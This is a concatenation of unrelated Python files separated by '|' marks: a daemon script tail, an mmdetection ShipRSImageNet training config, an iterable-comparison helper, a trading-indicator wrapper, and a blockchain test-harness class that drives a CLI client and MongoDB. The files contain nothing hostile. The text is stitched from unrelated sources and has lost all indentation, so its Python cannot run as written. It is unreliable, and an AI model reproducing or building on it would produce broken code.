pid = None
except SystemExit:
pid = None
if pid:
return True, pid
else:
return False, -1
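# Note: is_running only reports whether a PID could be read from the pid file;
# it does not verify that the process is still alive (e.g. via os.kill(pid, 0)).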
# Main
SCRIPT_PATH = os.path.abspath(os.path.dirname(__file__))
DB_FILE = SCRIPT_PATH + '/data/metrics.sqlite3'
CFG_FILE = SCRIPT_PATH + '/config/settings.cfg'
PID_FILE = SCRIPT_PATH + '/.__PACKAGE_NAME__-collector.pid'
POLL_INTERVAL = 30
DEBUG = False
if __name__ == "__main__":
if len(sys.argv) == 3:
DEBUG = True
if len(sys.argv) >= 2:
if 'status' == sys.argv[1]:
running, pid = is_running(PID_FILE)
if running:
print '%s is running as pid %s' % (sys.argv[0], pid)
else:
print '%s is not running.' % sys.argv[0]
elif 'stop' == sys.argv[1] and not is_running(PID_FILE)[0]:
print '%s is not running.' % sys.argv[0]
else:
collector = MetricsCollector(PID_FILE, DB_FILE, CFG_FILE, poll_interval=POLL_INTERVAL, debug=DEBUG)
daemon = runner.DaemonRunner(collector)
daemon.do_action() # start|stop|restart as sys.argv[1]
running, pid = is_running(PID_FILE)
sys.exit(0)
else:
print "Usage: %s start|stop|restart|status" % sys.argv[0]
sys.exit(2)
else:
print "%s can't be included in another program." % sys.argv[0]
sys.exit(1)
|
dataset_type = 'ShipRSImageNet_Level3'
# data_root = 'data/Ship_ImageNet/'
data_root = './data/ShipRSImageNet/'
CLASSES = ('Other Ship', 'Other Warship', 'Submarine', 'Other Aircraft Carrier', 'Enterprise', 'Nimitz', 'Midway','Ticonderoga',
'Other Destroyer', 'Atago DD', 'Arleigh Burke DD', 'Hatsuyuki DD', 'Hyuga DD','Asagiri DD', 'Other Frigate', 'Perry FF',
'Patrol', 'Other Landing', 'YuTing LL','YuDeng LL', 'YuDao LL', 'YuZhao LL', 'Austin LL', 'Osumi LL',
'Wasp LL','LSD 41 LL', 'LHA LL', 'Commander', 'Other Auxiliary Ship', 'Medical Ship', 'Test Ship', 'Training Ship',
'AOE', 'Masyuu AS', 'Sanantonio AS', 'EPF', 'Other Merchant', 'Container Ship', 'RoRo', 'Cargo',
'Barge', 'Tugboat', 'Ferry', 'Yacht', 'Sailboat', 'Fishing Vessel', 'Oil Tanker', 'Hovercraft',
'Motorboat','Dock',)
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True, with_mask=True),
# dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels', 'gt_masks']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
# img_scale=(1333, 800),
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
samples_per_gpu=8,
workers_per_gpu=2,
train=dict(
type=dataset_type,
classes=CLASSES,
ann_file=data_root + 'COCO_Format/ShipRSImageNet_bbox_train_level_3.json',
img_prefix=data_root + 'VOC_Format/JPEGImages/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
classes=CLASSES,
ann_file=data_root + 'COCO_Format/ShipRSImageNet_bbox_val_level_3.json',
img_prefix=data_root + 'VOC_Format/JPEGImages/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
classes=CLASSES,
ann_file=data_root + 'COCO_Format/ShipRSImageNet_bbox_val_level_3.json',
img_prefix=data_root + 'VOC_Format/JPEGImages/',
pipeline=test_pipeline))
evaluation = dict(interval=10, metric=['bbox', 'segm'])
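# Note (illustrative, not part of the original config): with samples_per_gpu=8 and
# workers_per_gpu=2, each GPU loads batches of 8 images using 2 dataloader workers,
# so the effective batch size is 8 * (number of training GPUs).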
|
from .assert_equal import assert_equal, EqualAssertionError
from collections.abc import Iterable
def is_iterable(v):
return isinstance(v, Iterable)
def iterables_equal(iterable1, iterable2):
return iterable1 == iterable2 or (
is_iterable(iterable1)
and is_iterable(iterable2)
and all(map(iterables_equal, iterable1, iterable2))
)
def assert_iterables_equal(actual_iterable, expected_iterable):
if not iterables_equal(actual_iterable, expected_iterable):
raise EqualAssertionError(actual_iterable, expected_iterable)
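# Illustrative examples (assumptions, not part of the original module):
#   iterables_equal([1, [2, 3]], (1, (2, 3)))  # True: element-wise, recursive comparison
#   iterables_equal([1, 2], [2, 1])            # False: order matters
# Caveat: map() stops at the shorter iterable, so trailing extra elements in the
# longer iterable are not reported as a difference.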
|
from typing import Union
import numpy as np
import talib
from jesse.helpers import get_candle_source
def ht_trendmode(candles: np.ndarray, source_type: str = "close", sequential: bool = False) -> Union[float, np.ndarray]:
"""
HT_TRENDMODE - Hilbert Transform - Trend vs Cycle Mode
:param candles: np.ndarray
:param source_type: str - default: "close"
:param sequential: bool - default=False
:return: int | np.ndarray
"""
if not sequential and len(candles) > 240:
candles = candles[-240:]
source = get_candle_source(candles, source_type=source_type)
res = talib.HT_TRENDMODE(source)
return res if sequential else res[-1]
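# Example usage (illustrative sketch; `candles` is assumed to be a jesse-style
# candle array and is not defined in this module):
#   mode = ht_trendmode(candles)                    # last value: 1 = trend mode, 0 = cycle mode
#   modes = ht_trendmode(candles, sequential=True)  # full 0/1 array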
|
import decimal
import subprocess
import time
import os
import re
import datetime
import json
from core_symbol import CORE_SYMBOL
from testUtils import Utils
from testUtils import Account
# pylint: disable=too-many-public-methods
class Node(object):
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-arguments
def __init__(self, host, port, pid=None, cmd=None, enableMongo=False, mongoHost="localhost", mongoPort=27017, mongoDb="ENUtest"):
self.host=host
self.port=port
self.pid=pid
self.cmd=cmd
self.killed=False # marks node as killed
self.enableMongo=enableMongo
self.mongoHost=mongoHost
self.mongoPort=mongoPort
self.mongoDb=mongoDb
self.endpointArgs="--url http://%s:%d" % (self.host, self.port)
self.mongoEndpointArgs=""
if self.enableMongo:
self.mongoEndpointArgs += "--host %s --port %d %s" % (mongoHost, mongoPort, mongoDb)
def __str__(self):
#return "Host: %s, Port:%d, Pid:%s, Cmd:\"%s\"" % (self.host, self.port, self.pid, self.cmd)
return "Host: %s, Port:%d" % (self.host, self.port)
@staticmethod
def validateTransaction(trans):
assert trans
assert isinstance(trans, dict), print("Input type is %s" % type(trans))
def printTrans(trans):
Utils.Print("ERROR: Failure in transaction validation.")
Utils.Print("Transaction: %s" % (json.dumps(trans, indent=1)))
assert trans["processed"]["receipt"]["status"] == "executed", printTrans(trans)
@staticmethod
def stdinAndCheckOutput(cmd, subcommand):
"""Passes input to stdin, executes cmd. Returns tuple with return code(int), stdout(byte stream) and stderr(byte stream)."""
assert(cmd)
assert(isinstance(cmd, list))
assert(subcommand)
assert(isinstance(subcommand, str))
outs=None
errs=None
ret=0
try:
popen=subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
outs,errs=popen.communicate(input=subcommand.encode("utf-8"))
ret=popen.wait()
except subprocess.CalledProcessError as ex:
msg=ex.output
return (ex.returncode, msg, None)
return (ret, outs, errs)
@staticmethod
def normalizeJsonObject(extJStr):
tmpStr=extJStr
tmpStr=re.sub(r'ObjectId\("(\w+)"\)', r'"ObjectId-\1"', tmpStr)
tmpStr=re.sub(r'ISODate\("([\w|\-|\:|\.]+)"\)', r'"ISODate-\1"', tmpStr)
tmpStr=re.sub(r'NumberLong\("(\w+)"\)', r'"NumberLong-\1"', tmpStr)
return tmpStr
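# Illustrative example (not part of the original source): normalizeJsonObject turns
#   '{"_id" : ObjectId("5a1b"), "ts" : ISODate("2018-01-01T00:00:00.000Z")}'
# into
#   '{"_id" : "ObjectId-5a1b", "ts" : "ISODate-2018-01-01T00:00:00.000Z"}'
# so the mongo shell output can be parsed with json.loads.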
@staticmethod
def runMongoCmdReturnJson(cmd, subcommand, trace=False):
"""Run mongodb subcommand and return response."""
assert(cmd)
assert(isinstance(cmd, list))
assert(subcommand)
assert(isinstance(subcommand, str))
retId,outs,errs=Node.stdinAndCheckOutput(cmd, subcommand)
if retId != 0:
Utils.Print("ERROR: mongodb call failed. %s" % (errs))
return None
outStr=Node.byteArrToStr(outs)
if not outStr:
return None
extJStr=Utils.filterJsonObject(outStr)
if not extJStr:
return None
jStr=Node.normalizeJsonObject(extJStr)
if not jStr:
return None
if trace: Utils.Print ("RAW > %s"% (outStr))
if trace: Utils.Print ("JSON> %s"% jStr)
try:
jsonData=json.loads(jStr)
except json.decoder.JSONDecodeError as _:
Utils.Print ("ERROR: JSONDecodeError")
Utils.Print ("Raw MongoDB response: > %s"% (outStr))
Utils.Print ("Normalized MongoDB response: > %s"% (jStr))
raise
return jsonData
@staticmethod
def getTransId(trans):
"""Retrieve transaction id from dictionary object."""
assert trans
assert isinstance(trans, dict), print("Input type is %s" % type(trans))
#Utils.Print("%s" % trans)
transId=trans["transaction_id"]
return transId
@staticmethod
def byteArrToStr(arr):
return arr.decode("utf-8")
def setWalletEndpointArgs(self, args):
self.endpointArgs="--url http://%s:%d %s" % (self.host, self.port, args)
def validateAccounts(self, accounts):
assert(accounts)
assert(isinstance(accounts, list))
for account in accounts:
assert(account)
assert(isinstance(account, Account))
if Utils.Debug: Utils.Print("Validating account %s" % (account.name))
accountInfo=self.getEnuAccount(account.name)
try:
assert(accountInfo)
if not self.enableMongo:
assert(accountInfo["account_name"] == account.name)
else:
assert(accountInfo["name"] == account.name)
except (AssertionError, TypeError, KeyError) as _:
Utils.Print("account validation failed. account: %s" % (account.name))
raise
# pylint: disable=too-many-branches
def getBlock(self, blockNum, silentErrors=False):
"""Given a blockId will return block details."""
assert(isinstance(blockNum, int))
if not self.enableMongo:
cmd="%s %s get block %d" % (Utils.EnuClientPath, self.endpointArgs, blockNum)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
block=Utils.runCmdReturnJson(cmd)
return block
except subprocess.CalledProcessError as ex:
if not silentErrors:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get block. %s" % (msg))
return None
else:
cmd="%s %s" % (Utils.MongoPath, self.mongoEndpointArgs)
subcommand='db.blocks.findOne( { "block_num": %d } )' % (blockNum)
if Utils.Debug: Utils.Print("cmd: echo '%s' | %s" % (subcommand, cmd))
try:
block=Node.runMongoCmdReturnJson(cmd.split(), subcommand)
if block is not None:
return block
except subprocess.CalledProcessError as ex:
if not silentErrors:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get db node get block. %s" % (msg))
return None
return None
def getBlockById(self, blockId, silentErrors=False):
cmd="%s %s" % (Utils.MongoPath, self.mongoEndpointArgs)
subcommand='db.blocks.findOne( { "block_id": "%s" } )' % (blockId)
if Utils.Debug: Utils.Print("cmd: echo '%s' | %s" % (subcommand, cmd))
try:
trans=Node.runMongoCmdReturnJson(cmd.split(), subcommand)
if trans is not None:
return trans
except subprocess.CalledProcessError as ex:
if not silentErrors:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during db get block by id. %s" % (msg))
return None
return None
def isBlockPresent(self, blockNum):
"""Does node have head_block_num >= blockNum"""
assert isinstance(blockNum, int)
assert (blockNum > 0)
info=self.getInfo(silentErrors=True)
assert(info)
node_block_num=0
try:
node_block_num=int(info["head_block_num"])
except (TypeError, KeyError) as _:
Utils.Print("Failure in get info parsing. %s" % (info))
raise
return True if blockNum <= node_block_num else False
def isBlockFinalized(self, blockNum):
"""Is blockNum finalized"""
assert(blockNum)
assert isinstance(blockNum, int)
assert (blockNum > 0)
info=self.getInfo(silentErrors=True)
assert(info)
node_block_num=0
try:
node_block_num=int(info["last_irreversible_block_num"])
except (TypeError, KeyError) as _:
Utils.Print("Failure in get info parsing. %s" % (info))
raise
finalized = True if blockNum <= node_block_num else False
if Utils.Debug:
if finalized:
Utils.Print("Block %d is finalized." % (blockNum))
else:
Utils.Print("Block %d is not yet finalized." % (blockNum))
return finalized
# pylint: disable=too-many-branches
def getTransaction(self, transId, silentErrors=False):
if not self.enableMongo:
cmd="%s %s get transaction %s" % (Utils.EnuClientPath, self.endpointArgs, transId)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
trans=Utils.runCmdReturnJson(cmd)
return trans
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
if "Failed to connect" in msg:
Utils.Print("ERROR: Node is unreachable. %s" % (msg))
raise
if not silentErrors:
Utils.Print("ERROR: Exception during transaction retrieval. %s" % (msg))
return None
else:
return self.getTransactionMdb(transId, silentErrors)
return None
def getTransactionMdb(self, transId, silentErrors=False):
"""Get transaction from MongoDB. Since DB only contains finalized blocks, transactions can take a while to appear in DB."""
cmd="%s %s" % (Utils.MongoPath, self.mongoEndpointArgs)
#subcommand='db.Transactions.findOne( { $and : [ { "trx_id": "%s" }, {"irreversible":true} ] } )' % (transId)
subcommand='db.transactions.findOne( { "trx_id": "%s" } )' % (transId)
if Utils.Debug: Utils.Print("cmd: echo '%s' | %s" % (subcommand, cmd))
try:
trans=Node.runMongoCmdReturnJson(cmd.split(), subcommand)
return trans
except subprocess.CalledProcessError as ex:
if not silentErrors:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get db node get trans. %s" % (msg))
return None
def isTransInBlock(self, transId, blockId):
"""Check if transId is within block identified by blockId"""
assert(transId)
assert(isinstance(transId, str))
assert(blockId)
assert(isinstance(blockId, int))
block=self.getBlock(blockId)
assert(block)
transactions=None
key=""
try:
if not self.enableMongo:
key="[transactions]"
transactions=block["transactions"]
else:
key="[blocks][transactions]"
transactions=block["block"]["transactions"]
except (AssertionError, TypeError, KeyError) as _:
Utils.Print("block%s not found. Block: %s" % (key,block))
raise
if transactions is not None:
for trans in transactions:
assert(trans)
try:
myTransId=trans["trx"]["id"]
if transId == myTransId:
return True
except (TypeError, KeyError) as _:
Utils.Print("transaction%s not found. Transaction: %s" % (key, trans))
return False
def getBlockIdByTransId(self, transId):
"""Given a transaction Id (string), will return block id (int) containing the transaction"""
assert(transId)
assert(isinstance(transId, str))
trans=self.getTransaction(transId)
if trans is None:
return None
refBlockNum=None
key=""
try:
if not self.enableMongo:
key="[trx][trx][ref_block_num]"
refBlockNum=trans["trx"]["trx"]["ref_block_num"]
else:
key="[transaction_header][ref_block_num]"
refBlockNum=trans["transaction_header"]["ref_block_num"]
refBlockNum=int(refBlockNum)+1
except (TypeError, ValueError, KeyError) as _:
Utils.Print("transaction%s not found. Transaction: %s" % (key, trans))
return None
headBlockNum=self.getHeadBlockNum()
assert(headBlockNum)
try:
headBlockNum=int(headBlockNum)
except(ValueError) as _:
Utils.Print("ERROR: Block info parsing failed. %s" % (headBlockNum))
raise
if Utils.Debug: Utils.Print("Reference block num %d, Head block num: %d" % (refBlockNum, headBlockNum))
for blockNum in range(refBlockNum, headBlockNum+1):
if self.isTransInBlock(str(transId), blockNum):
if Utils.Debug: Utils.Print("Found transaction %s in block %d" % (transId, blockNum))
return blockNum
return None
def getBlockIdByTransIdMdb(self, transId):
"""Given a transaction Id (string), will return block id (int) containing the transaction. This is specific to MongoDB."""
assert(transId)
assert(isinstance(transId, str))
trans=self.getTransactionMdb(transId)
if not trans: return None
refBlockNum=None
try:
refBlockNum=trans["transaction_header"]["ref_block_num"]
refBlockNum=int(refBlockNum)+1
except (TypeError, ValueError, KeyError) as _:
Utils.Print("transaction[transaction_header][ref_block_num] not found. Transaction: %s" % (trans))
return None
headBlockNum=self.getHeadBlockNum()
assert(headBlockNum)
try:
headBlockNum=int(headBlockNum)
except(ValueError) as _:
Utils.Print("Info parsing failed. %s" % (headBlockNum))
for blockNum in range(refBlockNum, headBlockNum+1):
if self.isTransInBlock(str(transId), blockNum):
return blockNum
return None
def isTransInAnyBlock(self, transId):
"""Check if transaction (transId) is in a block."""
assert(transId)
assert(isinstance(transId, (str,int)))
# if not self.enableMongo:
blockId=self.getBlockIdByTransId(transId)
# else:
# blockId=self.getBlockIdByTransIdMdb(transId)
return True if blockId else False
def isTransFinalized(self, transId):
"""Check if transaction (transId) has been finalized."""
assert(transId)
assert(isinstance(transId, str))
blockId=self.getBlockIdByTransId(transId)
if not blockId:
return False
assert(isinstance(blockId, int))
return self.isBlockFinalized(blockId)
# Create & initialize account and return creation transactions. Return transaction json object
def createInitializeAccount(self, account, creatorAccount, stakedDeposit=1000, waitForTransBlock=False, stakeNet=100, stakeCPU=100, buyRAM=100):
cmd='%s %s system newaccount -j %s %s %s %s --stake-net "%s %s" --stake-cpu "%s %s" --buy-ram "%s %s"' % (
Utils.EnuClientPath, self.endpointArgs, creatorAccount.name, account.name,
account.ownerPublicKey, account.activePublicKey,
stakeNet, CORE_SYMBOL, stakeCPU, CORE_SYMBOL, buyRAM, CORE_SYMBOL)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
trans=None
try:
trans=Utils.runCmdReturnJson(cmd)
transId=Node.getTransId(trans)
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during account creation. %s" % (msg))
return None
if stakedDeposit > 0:
self.waitForTransInBlock(transId) # seems like account creation needs to be finalized before transfer can happen
trans = self.transferFunds(creatorAccount, account, Node.currencyIntToStr(stakedDeposit, CORE_SYMBOL), "init")
transId=Node.getTransId(trans)
if waitForTransBlock and not self.waitForTransInBlock(transId):
return None
return trans
def createAccount(self, account, creatorAccount, stakedDeposit=1000, waitForTransBlock=False):
"""Create account and return creation transactions. Return transaction json object.
waitForTransBlock: wait on creation transaction id to appear in a block."""
cmd="%s %s create account -j %s %s %s %s" % (
Utils.EnuClientPath, self.endpointArgs, creatorAccount.name, account.name,
account.ownerPublicKey, account.activePublicKey)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
trans=None
try:
trans=Utils.runCmdReturnJson(cmd)
transId=Node.getTransId(trans)
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during account creation. %s" % (msg))
return None
if stakedDeposit > 0:
self.waitForTransInBlock(transId) # seems like account creation needs to be finalized before transfer can happen
trans = self.transferFunds(creatorAccount, account, "%0.04f %s" % (stakedDeposit/10000, CORE_SYMBOL), "init")
transId=Node.getTransId(trans)
if waitForTransBlock and not self.waitForTransInBlock(transId):
return None
return trans
def getEnuAccount(self, name):
assert(isinstance(name, str))
if not self.enableMongo:
cmd="%s %s get account -j %s" % (Utils.EnuClientPath, self.endpointArgs, name)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
trans=Utils.runCmdReturnJson(cmd)
return trans
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get account. %s" % (msg))
return None
else:
return self.getEnuAccountFromDb(name)
def getEnuAccountFromDb(self, name):
cmd="%s %s" % (Utils.MongoPath, self.mongoEndpointArgs)
subcommand='db.accounts.findOne({"name" : "%s"})' % (name)
if Utils.Debug: Utils.Print("cmd: echo '%s' | %s" % (subcommand, cmd))
try:
trans=Node.runMongoCmdReturnJson(cmd.split(), subcommand)
return trans
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get account from db. %s" % (msg))
return None
def getTable(self, contract, scope, table):
cmd="%s %s get table %s %s %s" % (Utils.EnuClientPath, self.endpointArgs, contract, scope, table)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
trans=Utils.runCmdReturnJson(cmd)
return trans
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during table retrieval. %s" % (msg))
return None
def getTableAccountBalance(self, contract, scope):
assert(isinstance(contract, str))
assert(isinstance(scope, str))
table="accounts"
trans = self.getTable(contract, scope, table)
assert(trans)
try:
return trans["rows"][0]["balance"]
except (TypeError, KeyError) as _:
print("transaction[rows][0][balance] not found. Transaction: %s" % (trans))
raise
def getCurrencyBalance(self, contract, account, symbol=CORE_SYMBOL):
"""returns raw output from get currency balance e.g. '99999.9950 CUR'"""
assert(contract)
assert(isinstance(contract, str))
assert(account)
assert(isinstance(account, str))
assert(symbol)
assert(isinstance(symbol, str))
cmd="%s %s get currency balance %s %s %s" % (Utils.EnuClientPath, self.endpointArgs, contract, account, symbol)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
trans=Utils.runCmdReturnStr(cmd)
return trans
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get currency stats. %s" % (msg))
return None
def getCurrencyStats(self, contract, symbol=CORE_SYMBOL):
"""returns Json output from get currency stats."""
assert(contract)
assert(isinstance(contract, str))
assert(symbol)
assert(isinstance(symbol, str))
cmd="%s %s get currency stats %s %s" % (Utils.EnuClientPath, self.endpointArgs, contract, symbol)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
trans=Utils.runCmdReturnJson(cmd)
return trans
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get currency stats. %s" % (msg))
return None
# Verifies account. Returns "get account" json return object
def verifyAccount(self, account):
assert(account)
if not self.enableMongo:
ret=self.getEnuAccount(account.name)
if ret is not None:
account_name=ret["account_name"]
if account_name is None:
Utils.Print("ERROR: Failed to verify account creation.", account.name)
return None
return ret
else:
return self.verifyAccountMdb(account)
def verifyAccountMdb(self, account):
assert(account)
ret=self.getEnuAccountFromDb(account.name)
if ret is not None:
account_name=ret["name"]
if account_name is None:
Utils.Print("ERROR: Failed to verify account creation.", account.name)
return None
return ret
return None
def waitForTransInBlock(self, transId, timeout=None):
"""Wait for trans id to be finalized."""
assert(isinstance(transId, str))
lam = lambda: self.isTransInAnyBlock(transId)
ret=Utils.waitForBool(lam, timeout)
return ret
def waitForTransFinalization(self, transId, timeout=None):
"""Wait for trans id to be finalized."""
assert(isinstance(transId, str))
lam = lambda: self.isTransFinalized(transId)
ret=Utils.waitForBool(lam, timeout)
return ret
def waitForNextBlock(self, timeout=None):
num=self.getHeadBlockNum()
lam = lambda: self.getHeadBlockNum() > num
ret=Utils.waitForBool(lam, timeout)
return ret
def waitForBlock(self, blockNum, timeout=None):
lam = lambda: self.getHeadBlockNum() > blockNum
ret=Utils.waitForBool(lam, timeout)
return ret
def waitForIrreversibleBlock(self, blockNum, timeout=None):
lam = lambda: self.getIrreversibleBlockNum() >= blockNum
ret=Utils.waitForBool(lam, timeout)
return ret
    # Transfer funds. Returns "transfer" json return object
def transferFunds(self, source, destination, amountStr, memo="memo", force=False, waitForTransBlock=False):
assert isinstance(amountStr, str)
assert(source)
assert(isinstance(source, Account))
assert(destination)
assert(isinstance(destination, Account))
cmd="%s %s -v transfer -j %s %s" % (
Utils.EnuClientPath, self.endpointArgs, source.name, destination.name)
cmdArr=cmd.split()
cmdArr.append(amountStr)
cmdArr.append(memo)
if force:
cmdArr.append("-f")
s=" ".join(cmdArr)
if Utils.Debug: Utils.Print("cmd: %s" % (s))
trans=None
try:
trans=Utils.runCmdArrReturnJson(cmdArr)
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during funds transfer. %s" % (msg))
return None
assert(trans)
transId=Node.getTransId(trans)
if waitForTransBlock and not self.waitForTransInBlock(transId):
return None
return trans
@staticmethod
def currencyStrToInt(balanceStr):
"""Converts currency string of form "12.3456 ENU" to int 123456"""
assert(isinstance(balanceStr, str))
balanceStr=balanceStr.split()[0]
#balance=int(decimal.Decimal(balanceStr[1:])*10000)
balance=int(decimal.Decimal(balanceStr)*10000)
return balance
@staticmethod
def currencyIntToStr(balance, symbol):
"""Converts currency int of form 123456 to string "12.3456 ENU" where ENU is symbol string"""
assert(isinstance(balance, int))
assert(isinstance(symbol, str))
balanceStr="%.04f %s" % (balance/10000.0, symbol)
return balanceStr
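    # Illustrative round-trip of the two helpers above (a sketch, not used by the framework):
    #   Node.currencyStrToInt("12.3456 ENU")  -> 123456
    #   Node.currencyIntToStr(123456, "ENU")  -> "12.3456 ENU"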
def validateFunds(self, initialBalances, transferAmount, source, accounts):
"""Validate each account has the expected ENU balance. Validate cumulative balance matches expectedTotal."""
assert(source)
assert(isinstance(source, Account))
assert(accounts)
assert(isinstance(accounts, list))
assert(len(accounts) > 0)
assert(initialBalances)
assert(isinstance(initialBalances, dict))
assert(isinstance(transferAmount, int))
currentBalances=self.getEnuBalances([source] + accounts)
assert(currentBalances)
assert(isinstance(currentBalances, dict))
assert(len(initialBalances) == len(currentBalances))
if len(currentBalances) != len(initialBalances):
Utils.Print("ERROR: validateFunds> accounts length mismatch. Initial: %d, current: %d" % (len(initialBalances), len(currentBalances)))
return False
for key, value in currentBalances.items():
initialBalance = initialBalances[key]
            assert(initialBalance is not None)
expectedInitialBalance = value - transferAmount
if key is source:
expectedInitialBalance = value + (transferAmount*len(accounts))
            if (initialBalance != expectedInitialBalance):
                Utils.Print("ERROR: validateFunds> Expected: %d, actual: %d for account %s" %
                            (expectedInitialBalance, initialBalance, key.name))
                return False
        return True
def getEnuBalances(self, accounts):
"""Returns a dictionary with account balances keyed by accounts"""
assert(accounts)
assert(isinstance(accounts, list))
balances={}
for account in accounts:
balance = self.getAccountEnuBalance(account.name)
balances[account]=balance
return balances
# Gets accounts mapped to key. Returns json object
def getAccountsByKey(self, key):
cmd="%s %s get accounts %s" % (Utils.EnuClientPath, self.endpointArgs, key)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
trans=Utils.runCmdReturnJson(cmd)
return trans
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during accounts by key retrieval. %s" % (msg))
return None
# Get actions mapped to an account (enucli get actions)
def getActions(self, account, pos=-1, offset=-1):
assert(isinstance(account, Account))
assert(isinstance(pos, int))
assert(isinstance(offset, int))
if not self.enableMongo:
cmd="%s %s get actions -j %s %d %d" % (Utils.EnuClientPath, self.endpointArgs, account.name, pos, offset)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
actions=Utils.runCmdReturnJson(cmd)
return actions
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during actions by account retrieval. %s" % (msg))
return None
else:
return self.getActionsMdb(account, pos, offset)
def getActionsMdb(self, account, pos=-1, offset=-1):
assert(isinstance(account, Account))
assert(isinstance(pos, int))
assert(isinstance(offset, int))
cmd="%s %s" % (Utils.MongoPath, self.mongoEndpointArgs)
subcommand='db.actions.find({$or: [{"data.from":"%s"},{"data.to":"%s"}]}).sort({"_id":%d}).limit(%d)' % (account.name, account.name, pos, abs(offset))
if Utils.Debug: Utils.Print("cmd: echo '%s' | %s" % (subcommand, cmd))
try:
actions=Node.runMongoCmdReturnJson(cmd.split(), subcommand)
if actions is not None:
return actions
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get db actions. %s" % (msg))
return None
# Gets accounts mapped to key. Returns array
def getAccountsArrByKey(self, key):
trans=self.getAccountsByKey(key)
assert(trans)
assert("account_names" in trans)
accounts=trans["account_names"]
return accounts
def getServants(self, name):
cmd="%s %s get servants %s" % (Utils.EnuClientPath, self.endpointArgs, name)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
trans=Utils.runCmdReturnJson(cmd)
return trans
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during servants retrieval. %s" % (msg))
return None
def getServantsArr(self, name):
trans=self.getServants(name)
servants=trans["controlled_accounts"]
return servants
def getAccountEnuBalanceStr(self, scope):
"""Returns ENU currency0000 account balance from enucli get table command. Returned balance is string following syntax "98.0311 ENU". """
assert isinstance(scope, str)
amount=self.getTableAccountBalance("enu.token", scope)
if Utils.Debug: Utils.Print("getNodeAccountEnuBalance %s %s" % (scope, amount))
assert isinstance(amount, str)
return amount
def getAccountEnuBalance(self, scope):
"""Returns ENU currency0000 account balance from enucli get table command. Returned balance is an integer e.g. 980311. """
balanceStr=self.getAccountEnuBalanceStr(scope)
balance=Node.currencyStrToInt(balanceStr)
return balance
def getAccountCodeHash(self, account):
cmd="%s %s get code %s" % (Utils.EnuClientPath, self.endpointArgs, account)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
retStr=Utils.checkOutput(cmd.split())
#Utils.Print ("get code> %s"% retStr)
p=re.compile(r'code\shash: (\w+)\n', re.MULTILINE)
m=p.search(retStr)
if m is None:
msg="Failed to parse code hash."
Utils.Print("ERROR: "+ msg)
return None
return m.group(1)
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during code hash retrieval. %s" % (msg))
return None
# publish contract and return transaction as json object
def publishContract(self, account, contractDir, wastFile, abiFile, waitForTransBlock=False, shouldFail=False):
cmd="%s %s -v set contract -j %s %s" % (Utils.EnuClientPath, self.endpointArgs, account, contractDir)
cmd += "" if wastFile is None else (" "+ wastFile)
cmd += "" if abiFile is None else (" " + abiFile)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
trans=None
try:
trans=Utils.runCmdReturnJson(cmd, trace=False)
except subprocess.CalledProcessError as ex:
if not shouldFail:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during code hash retrieval. %s" % (msg))
return None
else:
retMap={}
retMap["returncode"]=ex.returncode
retMap["cmd"]=ex.cmd
retMap["output"]=ex.output
# commented below as they are available only in Python3.5 and above
